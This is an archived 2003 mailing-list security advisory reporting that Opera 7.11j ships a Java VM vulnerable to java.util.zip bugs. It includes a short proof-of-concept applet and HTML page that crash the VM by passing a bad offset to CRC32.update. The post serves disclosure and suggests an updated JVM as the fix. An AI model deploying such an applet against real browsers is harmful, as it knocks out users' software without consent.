[VulnWatch] Opera 7.11 java.util.zip.* Vulnerability (fwd)
From: Marc Schoenefeld (schonef_at_uni-muenster.de)
Date: 05/11/03
- Previous message: Dennis Rand: "[VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 11 May 2003 01:48:54 +0200 (MES) To: vulnwatch@vulnwatch.org
---------- Forwarded message ----------
Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
From: Marc Schoenefeld <schonef@uni-muenster.de>
To: bugtraq@securityfocus.com
Subject: Opera 7.11 java.util.zip.* Vulnerability
Hi,
the just released Opera 7.11j comes with a java vm (1.4.1_01)
that is vulnerable to the java.util.zip.* bugs
that can cause denial of service via Java Applets
like the one with source printed below.
Therefore my suggestion towards the Opera deployment
team is to bundle java 1.4.1_02 which is not vulnerable
to the java.util.zip-Bugs.
All 1.3.1 versions are still vulnerable !
If you already installed java 1.4.1_02 prior to
installing Opera you are not vulnerable, because
the most current jvm seems to be chosen by opera
when running applets.
If you are interested in the details (not opera-specific),
read the whole story at www.illegalaccess.org or read:
http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html
Sincerely
Marc Schoenefeld
The applet code:
========CRCApplet.java=======================
import java.applet.Applet;
import java.awt.Graphics;
public class CRCApplet extends Applet{
public void paint(Graphics g) {
(new java.util.zip.CRC32()).update(new
byte[0],Integer.MAX_VALUE-3,4);
}
}
=============================================
The corresponding HTML
=======CRCApplet.html======================
|html>
|body>
|applet code=CRCApplet.class width=400 height=400>
|/applet>
|/body>
|/html>
===========================================
-- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer [ PGP Signature ok - Sun May 11 01:48:14 MES 2003 ]
- Previous message: Dennis Rand: "[VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
